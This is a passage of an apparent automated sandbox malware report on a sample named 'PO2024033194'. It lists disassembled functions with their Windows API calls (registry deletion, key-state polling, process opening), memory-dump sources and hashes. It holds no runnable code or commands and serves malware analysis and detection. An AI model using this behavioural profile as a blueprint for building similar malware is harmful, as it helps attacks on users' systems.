                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_memmove_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1589278365-1403004172
                                                                  • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                  • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                  Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Handle
                                                                  • String ID: nul
                                                                  • API String ID: 2519475695-2873401336
                                                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                  Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Handle
                                                                  • String ID: nul
                                                                  • API String ID: 2519475695-2873401336
                                                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                  Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • _wcsncpy.LIBCMT ref: 00401C41
                                                                  • _wcscpy.LIBCMT ref: 00401C5D
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                  • String ID: Line:
                                                                  • API String ID: 1874344091-1585850449
                                                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                  Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 0-1011021900
                                                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                  Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                  • GetFocus.USER32 ref: 0046157B
                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                  • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                  • __swprintf.LIBCMT ref: 00461608
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                  • String ID: %s%d
                                                                  • API String ID: 2645982514-1110647743
                                                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                  Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                  Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 3488606520-0
                                                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                  Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                  • String ID:
                                                                  • API String ID: 15295421-0
                                                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                  Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 004563A6
                                                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 3539004672-0
                                                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                  Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                  • String ID:
                                                                  • API String ID: 327565842-0
                                                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                  Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                  • String ID:
                                                                  • API String ID: 2832842796-0
                                                                  • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                  • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                  Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 2095303065-0
                                                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                  Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow
                                                                  • String ID:
                                                                  • API String ID: 861336768-0
                                                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                  Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32 ref: 00449598
                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                  • _wcslen.LIBCMT ref: 0044960D
                                                                  • _wcslen.LIBCMT ref: 0044961A
                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
